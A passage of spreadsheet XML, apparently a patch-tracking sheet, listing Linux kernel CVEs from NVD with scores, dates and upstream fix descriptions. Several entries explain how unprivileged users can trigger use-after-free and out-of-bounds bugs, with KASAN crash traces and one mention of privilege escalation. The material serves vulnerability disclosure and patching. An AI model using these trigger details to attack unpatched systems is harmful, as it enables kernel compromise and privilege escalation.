holds a reference on the source dentry but neither locks nor references
its parent, so a concurrent rename(2) can reparent the source while
security_path_link() runs, and the former parent can then be removed and
freed while the hook walks it.
A process can trigger this after entering a Landlock domain that handles
at least one filesystem access right.  The process can then race a
linkat(2) loop against rename(2) and rmdir(2):
  BUG: KASAN: slab-use-after-free in collect_domain_accesses+0x278/0x290
  Read of size 4 at addr ffff888160bd53f4 by task llrepro2/549
   collect_domain_accesses+0x278/0x290
   current_check_refer_path+0x952/0x1120
   security_path_link+0x1be/0x320
   filename_linkat+0x342/0x6d0
   __x64_sys_linkat+0xfa/0x150
  Freed by task 562:
   kmem_cache_free+0x139/0x4c0
   i_callback+0x4b/0x80
   rcu_core+0x7dc/0x10a0
Take a reference on the dentry selected as the source parent, using
dget() for the common-mount-root case and dget_parent() otherwise.
Release it after the hierarchy walk and synchronous audit logging.
[mic: Clarify the caller, reachability, and reference handling]</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97594</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97602</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr"/>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
inet: frags: invalidate queues before flushing them
fqdir_pre_exit() flushes the skbs from incomplete queues without
changing their completion state. A fragment which found a queue before
high_thresh was cleared can then acquire the queue lock and reuse stale
reassembly metadata. A queue concurrently killed after fqdir-&gt;dead is
set can instead become INET_FRAG_COMPLETE|INET_FRAG_HASH_DEAD while
still holding its old skbs; skipping it because it is complete leaves
those references behind until asynchronous fqdir teardown.
For IPv6, stale metadata can make ip6_frag_reasm() use the old
nhoffset with a new skb and access memory out of bounds. The resulting
heap corruption can be leveraged for local privilege escalation when
unprivileged network namespaces are available. Unflushed fragments can
also keep conntrack references alive after the conntrack per-net
cleanup point.
Kill each incomplete queue, then flush every queue still owned by the
dying rhashtable. HASH_DEAD identifies that ownership, while complete
queues without it are already owned by another destroy path and must be
left alone. Releasing a timer reference removed by inet_frag_kill() is
deferred to inet_frag_putn(), after the queue lock is dropped.
KASAN report:
  BUG: KASAN: slab-out-of-bounds in ipv6_frag_rcv (net/ipv6/reassembly.c:289 (discriminator 2) net/ipv6/reassembly.c:229 (discriminator 2) net/ipv6/reassembly.c:391 (discriminator 2))
  Write of size 1 at addr ff110001039c6e00 by task poc/771
  Call Trace:
  ? ipv6_frag_rcv (net/ipv6/reassembly.c:289 (discriminator 2) net/ipv6/reassembly.c:229 (discriminator 2) net/ipv6/reassembly.c:391 (discriminator 2))
  ipv6_frag_rcv (net/ipv6/reassembly.c:289 (discriminator 2) net/ipv6/reassembly.c:229 (discriminator 2) net/ipv6/reassembly.c:391 (discriminator 2))
  ip6_protocol_deliver_rcu (net/ipv6/ip6_input.c:479 (discriminator 5))
  ip6_input_finish (net/ipv6/ip6_input.c:534)
  ipv6_rcv (include/net/dst.h:480 (discriminator 3) net/ipv6/ip6_input.c:119 (discriminator 3) net/ipv6/ip6_input.c:109 (discriminator 3) include/linux/netfilter.h:325 (discriminator 3) include/linux/netfilter.h:319 (discriminator 3) net/ipv6/ip6_input.c:351 (discriminator 3))
  packet_sendmsg (net/packet/af_packet.c:3110 net/packet/af_packet.c:3142)
  __x64_sys_sendmmsg (net/socket.c:2883 net/socket.c:2880 net/socket.c:2880)
  The buggy address belongs to the object at ff110001039c6b40
  which belongs to the cache skbuff_small_head of size 704
  The buggy address is located 0 bytes to the right of
  allocated 704-byte region [ff110001039c6b40, ff110001039c6e00)
  BUG: KASAN: slab-out-of-bounds in ip6_protocol_deliver_rcu (net/ipv6/ip6_input.c:423 (discriminator 1))
  Read of size 1 at addr ff110001039c6e08 by task poc/771
  Call Trace:
  ? ip6_protocol_deliver_rcu (net/ipv6/ip6_input.c:423 (discriminator 1))
  ip6_protocol_deliver_rcu (net/ipv6/ip6_input.c:423 (discriminator 1))
  ip6_input_finish (net/ipv6/ip6_input.c:534)
  ipv6_rcv (include/net/dst.h:480 (discriminator 3) net/ipv6/ip6_input.c:119 (discriminator 3) net/ipv6/ip6_input.c:109 (discriminator 3) include/linux/netfilter.h:325 (discriminator 3) include/linux/netfilter.h:319 (discriminator 3) net/ipv6/ip6_input.c:351 (discriminator 3))
  packet_sendmsg (net/packet/af_packet.c:3110 net/packet/af_packet.c:3142)
  __x64_sys_sendmmsg (net/socket.c:2883 net/socket.c:2880 net/socket.c:2880)
  packet_sendmsg (net/packet/af_packet.c:2959 net/packet/af_packet.c:3053 net/packet/af_packet.c:3142)
  __x64_sys_sendmmsg (net/socket.c:2883 net/socket.c:2880 net/socket.c:2880)
  The buggy address belongs to the object at ff110001039c6b40
  which belongs to the cache skbuff_small_head of size 704
  The buggy address is located 8 bytes to the right of
  allocated 704-byte region [ff110001039c6b40, ff110001039c6e00)</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97602</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97611</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr"/>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: openvswitch: fix use-after-free of the flow table mask array
tbl_mask_array_realloc() retires the old mask_array before it stops being
reachable:
	old = ovsl_dereference(tbl-&gt;mask_array);
	if (old) {
		...
		call_rcu(&amp;old-&gt;rcu, mask_array_rcu_cb);
	}
	rcu_assign_pointer(tbl-&gt;mask_array, new);
call_rcu() only waits for read-side critical sections already in flight.
tbl-&gt;mask_array still points at old between the call_rcu() and the
rcu_assign_pointer(), so a reader entering ovs_flow_tbl_lookup_stats() in
that window picks up old in a fresh critical section that the pending
grace period does not cover.
tbl_mask_array_realloc() runs in process context under ovs_mutex, so the
window is preemptible and can outlast the grace period. Then
mask_array_rcu_cb() frees old before the swap runs:
  BUG: KASAN: slab-use-after-free in flow_lookup.constprop.0+0x2bf/0x2f0
  Read of size 8 at addr ffff888020b3e018 by task poc/741
   flow_lookup.constprop.0+0x2bf/0x2f0
   ovs_flow_tbl_lookup_stats+0x4a3/0x5c0
   ovs_dp_process_packet+0x19c/0x710
   ovs_vport_receive+0x243/0x390
   internal_dev_xmit+0x81/0x170
  Freed by task 728:
   kfree+0x16a/0x4e0
   rcu_core+0x853/0x1030
Publish the new array before retiring the old one. The kfree_rcu() that
call_rcu() replaced ran after the swap.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97611</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97612</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr">
        <is>
          <t>f5, go, gin, rust</t>
        </is>
      </c>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr"/>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: mpls: clear inner_protocol when the last label is popped
skb_mpls_push() records the pre-encapsulation network header once, gated
on !skb-&gt;inner_protocol. skb_mpls_pop() never clears that record, so it
outlives the encapsulation it describes.
Open vSwitch can then re-push MPLS onto a packet whose
inner_network_header still points at the older, deeper offset: push a
label, pop every label, recirculate (ovs_flow_key_update() re-derives
key-&gt;eth.type and resets network_header, but leaves inner_*), then push
again. ovs_fragment() trusts the record:
	skb-&gt;network_header = skb-&gt;inner_network_header;
so skb_network_offset() goes negative. The bound check is signed:
	if (skb_network_offset(skb) &gt; MAX_L2_LEN)
a negative offset passes it, and prepare_frag() widens the value:
	unsigned int hlen = skb_network_offset(skb);
	memcpy(&amp;data-&gt;l2_data, skb-&gt;data, hlen);
which is a ~4GiB memcpy out of a 30-byte per-CPU buffer.
Reproduced on v7.3-rc1. RDX is the truncated length, (unsigned int)(-8):
  BUG: unable to handle page fault for address: ffffe8ffffc16000
  #PF: supervisor write access in kernel mode
  Oops: 0002 [#1] SMP KASAN NOPTI
  RIP: 0010:memcpy+0x8/0x20
  RDX: 00000000fffffff8 RSI: ffff888105d732db RDI: ffffe8ffffc16000
   prepare_frag+0x3df/0x4e0
   ovs_fragment+0x589/0x7e0
   do_output+0x4ce/0x5e0
   do_execute_actions+0x55d2/0x7b30
   ovs_execute_actions+0xea/0x450
Same root-cause shape as commit 975b5b067f52 ("ipv6: sr: restore network
header before routing and forwarding"): a stale network header offset
reaching a consumer that widens it. Here it originates in the MPLS
push/pop path.
Clear inner_protocol once the packet is no longer MPLS, so a later push
re-records the current header. net/sched/act_mpls.c is the only other
skb_mpls_pop() caller and gets the same fix; sch_frag.c saves and
restores inner_protocol around fragmentation in the same way OVS does.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97612</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97903</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr"/>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
exit: hold a reference to thread_pid across proc_flush_pid
Commit 0a36bad01731 ("release_task: kill the no longer needed
get/put_pid(thread_pid)") removed the reference around proc_flush_pid().
It assumed that free_pids(post.pids) at the end of release_task() would
keep thread_pid alive until then.
That assumption is wrong.  __change_pid() only records a detached PID in
post.pids when pid_has_task() is false for every PIDTYPE.  If another task
still uses the exiting task's PID as its process group or session ID,
__unhash_process() removes the exiting task's PIDTYPE_PID link but leaves
the PID out of post.pids.  release_task() therefore holds no reference to
it after dropping tasklist_lock.
The other task can then remove the remaining PIDTYPE links.  Its
free_pids() call schedules delayed_put_pid(), and the RCU callback can free
the PID before the first release_task() reaches proc_flush_pid().
An unprivileged reproducer races wait4(-1) against setsid() to trigger this
ordering.  Three of three fresh v7.2 KASAN boots reported:
    BUG: KASAN: slab-use-after-free in
    proc_invalidate_siblings_dcache+0x3e2/0x3f0
    Read of size 8 by task h7_pid_reaper/1921
    Call Trace:
     proc_invalidate_siblings_dcache
     release_task
     wait_consider_task
     __do_wait
     do_wait
     kernel_wait4
    Freed by task 0:
     kmem_cache_free
     put_pid
     delayed_put_pid
     rcu_core
    Last potentially related work creation:
     __call_rcu_common
     free_pids
     ksys_setsid
KASAN identified a 144-byte object from the pid cache and located the bad
read 80 bytes into the freed object, matching pid-&gt;inodes.  With an
explicit reference, three of three fresh boots completed without a KASAN
report.  The concurrent RCU callback dropped its reference while
proc_flush_pid() was protected, and the balancing put_pid() performed the
final free afterward.
Take a reference before __unhash_process() clears p-&gt;thread_pid and release
it after proc_flush_pid() completes.
A tested source reproducer is available privately on request.  No
controlled read or write, information leak, or privilege escalation is
claimed.  The mainline patch applies directly to v6.19.y and newer;
v6.16.y through v6.18.y need a context-adjusted backport.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97903</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97910</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr"/>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: sprd: validate compress buffer sizes against fixed allocations
sprd_platform_compr_open() allocates the stage 0 IRAM buffer (32K data
area) and the stage 1 DDR buffer (2M data area) with fixed sizes, but
sprd_platform_compr_copy() derives all copy lengths from the user
controlled runtime-&gt;fragment_size and the write() count, never
comparing them against the physical buffer sizes. The compress core
only checks fragment_size * fragments for an u32 overflow in
snd_compress_check_input(), so a local user can configure a logical
buffer of up to ~4GB via SNDRV_COMPRESS_SET_PARAMS, far exceeding the
fixed allocations.
A fragment_size larger than the 32K IRAM data area makes the stage 0
copy_from_user() overflow past the IRAM allocation, and a buffer_size
larger than the 2M DDR buffer makes the wrapping copy at the end of
sprd_platform_compr_copy() write fully user controlled data past the
buffer. No SNDRV_PCM_TRIGGER_START is needed, a write() in SETUP
state reaches the copy callback directly.
Reject parameters that do not fit into the fixed buffers in
set_params(), and fix the advertised max fragment size: 128K never
fitted into the 32K IRAM buffer. The caps values may have been carried over
from the qdsp6 driver, which allocates its buffers according to the
advertised maxima, unlike this driver. With 32K as max fragment size
the advertised limits are self-consistent: 32K * 64 = 2M equals the
DDR buffer size.
Discovered by Atuin - Automated Vulnerability Discovery Engine.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97910</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97911</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr"/>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel: ethosu: Ensure SRAM region size matches job
It is possible for userspace to set the job SRAM size to 0, but then still
have SRAM accesses in the command stream. When the job SRAM size is 0,
setting the region base register is skipped and a stale base address from
a prior job is used.
Check the region size against the job's SRAM size instead of just the size
of the SRAM. The job's SRAM size was already checked against the total SRAM
size.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97911</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97937</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr"/>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ftrace: fork: Initialize function graph state before copy_exec_state()
dup_task_struct() copies the parent's task_struct, including ret_stack.
ftrace_graph_init_task() clears the copied function graph state, but it
currently runs after copy_exec_state().
For non-CLONE_VM forks, copy_exec_state() allocates a new task_exec_state.
If that allocation fails, copy_process() reaches bad_fork_free and
free_task() calls ftrace_graph_exit_task(). Since the child still carries
the parent's ret_stack pointer, the unwind frees the parent's active
function graph return stack. The parent subsequently accesses freed memory
from function_graph_enter_regs().
KASAN reports:
[   22.190920] ==================================================================
[   22.195899] BUG: KASAN: slab-use-after-free in function_graph_enter_regs+0xa76/0xb90
[   22.200747] Write of size 8 at addr ff110000054dc0a8 by task repro/1
[   22.205134]
[   22.210770] CPU: 0 UID: 0 PID: 1 Comm: repro Not tainted 7.2.0-07732-g9328b3b03bdc-dirty #3 PREEMPT(lazy)
[   22.212576] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[   22.213750] Call Trace:
[   22.215271]  &lt;TASK&gt;
[   22.216242]  ? ftrace_stub_direct_tramp+0x10/0x10
[   22.217774]  dump_stack_lvl+0x4e/0x70
[   22.220531]  print_report+0x157/0x4b4
[   22.223202]  ? fixup_red_left+0x9/0x30
[   22.224407]  ? complete_report_info+0x83/0x110
[   22.226679]  ? function_graph_enter_regs+0xa76/0xb90
[   22.228084]  kasan_report+0xce/0x100
[   22.230109]  ? function_graph_enter_regs+0xa76/0xb90
[   22.232860]  ? stack_trace_save+0x4/0xd0
[   22.234156]  function_graph_enter_regs+0xa76/0xb90
[   22.236090]  ? kasan_save_stack+0x30/0x50
[   22.237752]  ? __pfx_function_graph_enter_regs+0x10/0x10
[   22.238694]  ? ring_buffer_lock_reserve+0x345/0xf80
[   22.239628]  ? stack_trace_save+0x4/0xd0
[   22.242121]  ? stack_trace_save+0x4/0xd0
[   22.243588]  ftrace_graph_func+0xda/0x160
[   22.245362]  ? ftrace_stub_direct_tramp+0x10/0x10
[   22.246520]  0xffffffffa0000095
[   22.250528]  ? stack_trace_save+0x9/0xd0
[   22.251757]  ? ring_buffer_unlock_commit+0x11d/0x5c0
[   22.253152]  stack_trace_save+0x9/0xd0
[   22.254264]  kasan_save_stack+0x30/0x50
[   22.273631]  kasan_save_track+0x14/0x30
[   22.276763]  kasan_save_free_info+0x3b/0x70
[   22.278296]  __kasan_slab_free+0x43/0x70
[   22.280157]  kmem_cache_free+0xbf/0x3b0
[   22.282963]  ? ftrace_stub_direct_tramp+0x10/0x10
[   22.284001]  free_task+0xa2/0x160
[   22.285699]  ? ftrace_stub_direct_tramp+0x10/0x10
[   22.286752]  copy_process+0x2aae/0x7bc0
Initialize the child function graph state immediately after
dup_task_struct(), before the first fallible operation.</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97937</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97940</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr"/>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: fix fib6 walker UAF on seq stop
ipv6_route_iter_active() treats a walker in FWS_U at the table root as
already unlinked. fib6_del_route() can move a still-linked walker into
that same state when the current leaf is the last route at the root,
so ipv6_route_native_seq_stop() skips fib6_walker_unlink(). The seq
private object can then be freed while it remains on
net-&gt;ipv6.fib6_walkers. A later route deletion walks the dangling list
and uses the freed walker.
Use the list head as membership state and reinitialize it when
unlinking. Keep the existing w-&gt;node check so a never-started iterator
with a zeroed private object is not treated as linked.
The same stop helper is used by /proc/net/ipv6_route and by the BPF
ipv6_route iterator. The BPF show path only widens the race.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97940</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97941</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr"/>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr"/>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/slab: take n-&gt;list_lock in __slab_try_return_freelist() to avoid race
Commit ba7425312607 ("mm, slab: add an optimistic
__slab_try_return_freelist()") incorrectly assumed that nobody has freed
an object to the slab as long as slab-&gt;freelist is NULL and cmpxchg
succeeds.
However, as reported by Hyunwoo Kim [1], other CPUs might have freed
an object to the slab, insert the slab to the partial list, then
allocated an object from the slab, and be in the middle of removing
the slab from the list under n-&gt;list_lock.
Since __refill_objects_node() puts the slab back on pc.slabs
outside n-&gt;list_lock, it might insert the slab into that list while
the slab is concurrently being removed from n-&gt;partial.
This led to a list corruption [1]:
  list_add corruption. next-&gt;prev should be prev
  (ffff888100000248), but was dead000000000122.
  (next=ffffea000416e410).
  kernel BUG at lib/list_debug.c:29!
  Oops: invalid opcode: 0000 [#1] SMP NOPTI
  CPU: 1 UID: 65534 PID: 144 Comm: poc Not tainted
  7.2.0-16172-gcf72cbb39da8-dirty #1 PREEMPT(lazy)
  RIP: 0010:__list_add_valid_or_report+0x80/0xd0
  ...
  Call Trace:
   alloc_from_new_slab+0x183/0x300
   ___slab_alloc+0x31c/0x890
   __kmalloc_noprof+0x3d4/0x800
